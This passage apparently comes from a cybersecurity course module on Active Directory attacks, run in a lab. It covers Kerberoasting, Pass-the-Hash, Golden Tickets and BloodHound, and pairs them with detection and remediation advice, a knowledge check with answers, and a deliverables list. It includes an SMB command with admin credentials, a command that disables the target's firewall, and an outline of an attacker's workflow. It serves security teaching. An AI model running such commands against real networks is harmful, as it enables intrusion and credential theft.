**Solution:**
```bash
# TEST SMB CONNECTIVITY
smbclient -L //10.10.4.110 -U Administrator%P@ssw0rd!
# Should show ADMIN$, C$, IPC$ shares
# CHECK WINDOWS FIREWALL ON TARGET (from compromised shell)
Get-NetFirewallProfile | Select-Object Name, Enabled
# If enabled, disable for lab: Set-NetFirewallProfile -Profile Domain,Public,Private -Enabled False
```
---
## PROFESSOR'S GUIDANCE
### Why Active Directory is the "Crown Jewel"
**Statistics from Real Breaches:**
- 82% of data breaches involve stolen credentials (Verizon DBIR 2023)
- Average time to crack Kerberoasted password: 6 hours (weak), 2 days (medium)
- 95% of organizations have at least one SPN with weak password
- 80% of organizations never rotate KRBTGT password (golden tickets persist indefinitely)
**Real-World Attacker Workflow:**
1. Phishing email → User clicks → Download payload
2. Payload beacons to C2 server → Attacker gains foothold
3. Run Mimikatz/SharpHound → Extract credentials, map domain
4. Kerberoast service accounts → Crack offline → Obtain Domain Admin
5. Lateral movement → Access file servers, databases → Exfiltrate data
6. Deploy ransomware → Domain-wide encryption
**Defense-in-Depth Strategy:**
- **Prevent:** Strong passwords (15+ chars), LAPS, Credential Guard
- **Detect:** Log Event IDs 4768/4769/4624/4688, monitor NTLM usage
- **Respond:** Isolate compromised accounts, reset KRBTGT (twice), forensic analysis
### Common Student Mistakes
**1. Using Domain Admin for everything:**
- In real enterprise, you'd use least-privilege service accounts
- Lab uses DA for simplicity, but document "in production, use delegated access"
**2. Not capturing network traffic:**
- Run Wireshark during Kerberoasting to see TGS-REQ/TGS-REP exchange
- Blue team needs to recognize these patterns in PCAP analysis
**3. Forgetting to reset KRBTGT after Golden Ticket lab:**
- Golden tickets persist even if you "fix" everything else
- Must reset KRBTGT password TWICE (24 hours apart) to fully remediate
**4. Over-relying on tools without understanding:**
- BloodHound is NOT magic—it visualizes AD relationships you could query manually
- Practice writing custom LDAP queries (ldapsearch, PowerShell Get-ADUser)
### Time Investment
- AD deployment: 2-3 hours
- Kerberoasting lab: 1-2 hours
- Pass-the-Hash lab: 1-2 hours
- Lateral movement: 1-2 hours
- BloodHound enumeration: 2-3 hours
- Golden Ticket attack: 1-2 hours
- Detection rules: 2-3 hours
**Total: 10-18 hours**
### Real-World Skills Developed
By mastering this module, you can:
- Perform AD penetration testing for Red Team engagements
- Identify identity-based attack vectors in enterprise environments
- Implement detection rules for credential theft (SOC analyst role)
- Architect secure AD environments (prevent Kerberoasting, PtH)
- Understand attacker tradecraft (MITRE ATT&CK Lateral Movement tactics)
---
## KNOWLEDGE CHECK
Before proceeding to MOD6, you should be able to:
1. **What makes an account Kerberoastable?**
- Answer: Account must have Service Principal Name (SPN) registered
2. **Why is Kerberoasting attractive to attackers?**
- Answer: Offline cracking (no account lockout), any domain user can request tickets, targets weak passwords
3. **What is the difference between Pass-the-Hash and Pass-the-Ticket?**
- Answer: PtH uses NTLM hash for authentication, PtT uses Kerberos ticket (TGT or service ticket)
4. **How does PsExec achieve code execution?**
- Answer: Copies executable to ADMIN$ share, creates Windows service, starts service, returns output via named pipes
5. **What is the BloodHound query to find Kerberoastable accounts?**
- Answer: Analysis > "List all Kerberoastable Accounts" or Cypher: `MATCH (u:User {hasspn: true}) RETURN u`
6. **Why are Golden Tickets called "golden"?**
- Answer: Forged TGT grants access to ANY resource, valid for 10 years, persists after password resets
7. **What Windows Event ID indicates Kerberos service ticket request?**
- Answer: Event ID 4769 (TGS-REQ)
8. **How do you fully remediate Golden Ticket attack?**
- Answer: Reset KRBTGT password TWICE (24 hours apart) to invalidate all forged tickets
---
## DELIVERABLES CHECKLIST
Before proceeding to Module 6, submit/complete:
- [ ] Windows Server 2022 Domain Controller configured (apophis.local)
- [ ] Windows 10 endpoint joined to domain
- [ ] Service account (svc_sql) with SPN created
- [ ] Kerberoasting output showing cracked password
- [ ] Secretsdump output with NTLM hashes extracted
- [ ] PsExec screenshot showing SYSTEM shell on remote target
- [ ] CrackMapExec output showing "Pwn3d!" with Pass-the-Hash
- [ ] BloodHound JSON files and attack path visualization screenshot
- [ ] Golden Ticket creation and usage demonstration
- [ ] Screenshots showing:
- [ ] GetUserSPNs.py enumeration
- [ ] Hashcat cracking Kerberos ticket
- [ ] Secretsdump dumping DC hashes
- [ ] PsExec shell with whoami output
- [ ] BloodHound shortest path to Domain Admins
- [ ] CrackMapExec lateral movement to multiple hosts
- [ ] Event Viewer showing Event ID 4769 (Kerberoasting detection)
---
**END OF MODULE 5**
**Next Steps:**
1. Take snapshot of all VMs: "Post-MOD5-AD-Compromise"
2. Document all extracted credentials in password spreadsheet
3. Practice writing detection rules for each attack technique
4. Proceed to **MOD6: Incident Response & Digital Forensics**
**Remember:** Every credential you steal as Red Team becomes forensic evidence for Blue Team. In MOD6, you'll investigate these attacks from the defender's perspective!
Reference in New Issue View Git Blame Copy Permalink